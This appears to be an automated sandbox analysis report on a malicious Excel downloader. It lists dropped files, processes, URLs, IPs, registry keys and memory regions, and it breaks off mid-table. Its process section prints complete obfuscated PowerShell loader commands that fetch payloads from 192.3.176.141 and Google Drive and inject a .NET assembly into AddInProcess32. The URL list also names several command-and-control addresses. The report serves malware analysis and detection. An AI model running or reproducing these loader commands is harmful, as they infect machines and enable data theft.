Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 01:49:36 2024, Security: 1
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicegirlwithnewthingswhichevennobodknowthatkissingme[1].hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\~$SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx
|
data
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\educationalthingswithgreatattitudeonhere[1].tiff
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1AD36F6.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2whqha0s.5gp.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RESB606.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 24 19:22:51 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cxpovzpe.jz0.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\hrd142a2.xme.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (356)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\onmobile.052.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\oy5ige3r.s3s.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\rkssuzly.mkd.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\rsexq0o0.otx.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ty0431oy.k2y.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF22AE04FAAD033A29.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF449E3A8D3C8ED422.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
|
data
|
modified
|
||
|
C:\Users\user\Desktop\09230000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 20:22:56 2024, Security: 1
|
dropped
|
||
|
C:\Users\user\Desktop\09230000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\Desktop\SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 20:22:56 2024, Security: 1
|
dropped
|
There are 19 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex
Bypass -Nop -w 1
-c deVICECrEdenTIaLDePlOYMENT.exe ;
Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r
f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText
= [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex
= 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex
-gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command
= 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI
ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly
= [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull,
@(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V,
f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$')
)"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp"
"c:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://kbfvzoboss.bid/alien/fre.php
|
|
||
|
http://alphastand.top/alien/fre.php
|
|
||
|
|||
|
http://alphastand.win/alien/fre.php
|
|
||
|
http://alphastand.trade/alien/fre.php
|
|
||
|
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta
|
192.3.176.141
|
|
|
|
http://94.156.177.220/simple/five/fre.php
|
94.156.177.220
|
|
|
|
http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIF
|
192.3.176.141
|
|
|
|
http://192.3.176.141/35/SMLPERR.txt
|
192.3.176.141
|
|
|
|
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaf
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://mpa.li/ZDFWtO
|
5.159.62.244
|
||
|
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htag
|
unknown
|
||
|
http://192.3.176.141/35/educatio
|
unknown
|
||
|
http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIFp
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
https://mpa.li/
|
unknown
|
||
|
http://192.3.176.141/
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta_
|
unknown
|
||
|
http://www.ibsensoftware.com/
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaw
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htal
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIF34e089r
|
unknown
|
||
|
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htak
|
unknown
|
||
|
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaG
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
https://mpa.li/C:T
|
unknown
|
||
|
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaA
|
unknown
|
||
|
http://192.3.176.141/Z
|
unknown
|
||
|
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htahttp://192.3.176.
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta...
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaS
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
|
https://mpa.li/6432H
|
unknown
|
There are 37 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.186.46
|
||
|
drive.usercontent.google.com
|
172.217.16.193
|
||
|
mpa.li
|
5.159.62.244
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.3.176.141
|
unknown
|
United States
|
|
|
|
94.156.177.220
|
unknown
|
Bulgaria
|
|
|
|
142.250.186.46
|
drive.google.com
|
United States
|
||
|
5.159.62.244
|
mpa.li
|
Germany
|
||
|
5.159.62.243
|
unknown
|
Germany
|
||
|
172.217.16.193
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
)20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28546
|
28546
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
t70
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3299F
|
3299F
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32A7A
|
32A7A
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 49 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
900000
|
heap
|
page read and write
|
|
|
|
41A000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
466000
|
heap
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
26F000
|
heap
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
3E6C000
|
heap
|
page read and write
|
||
|
2726000
|
trusted library allocation
|
page read and write
|
||
|
1A5B8000
|
heap
|
page execute and read and write
|
||
|
2A98000
|
trusted library allocation
|
page read and write
|
||
|
397000
|
heap
|
page read and write
|
||
|
1B11E000
|
stack
|
page read and write
|
||
|
1D10000
|
heap
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
2816000
|
trusted library allocation
|
page read and write
|
||
|
20BB000
|
heap
|
page read and write
|
||
|
466000
|
heap
|
page read and write
|
||
|
2880000
|
heap
|
page read and write
|
||
|
7FE89AA4000
|
trusted library allocation
|
page read and write
|
||
|
251000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1C68F000
|
stack
|
page read and write
|
||
|
2976000
|
trusted library allocation
|
page read and write
|
||
|
44F000
|
heap
|
page read and write
|
||
|
40E0000
|
heap
|
page read and write
|
||
|
4E7000
|
heap
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
3859000
|
heap
|
page read and write
|
||
|
7FE89A94000
|
trusted library allocation
|
page read and write
|
||
|
1C201000
|
heap
|
page read and write
|
||
|
399000
|
heap
|
page read and write
|
||
|
3F4000
|
heap
|
page read and write
|
||
|
1C7B000
|
heap
|
page read and write
|
||
|
230E000
|
stack
|
page read and write
|
||
|
4CF000
|
heap
|
page read and write
|
||
|
1ACBE000
|
stack
|
page read and write
|
||
|
3260000
|
trusted library allocation
|
page read and write
|
||
|
1AF0000
|
heap
|
page read and write
|
||
|
2824000
|
trusted library allocation
|
page read and write
|
||
|
3840000
|
heap
|
page read and write
|
||
|
388000
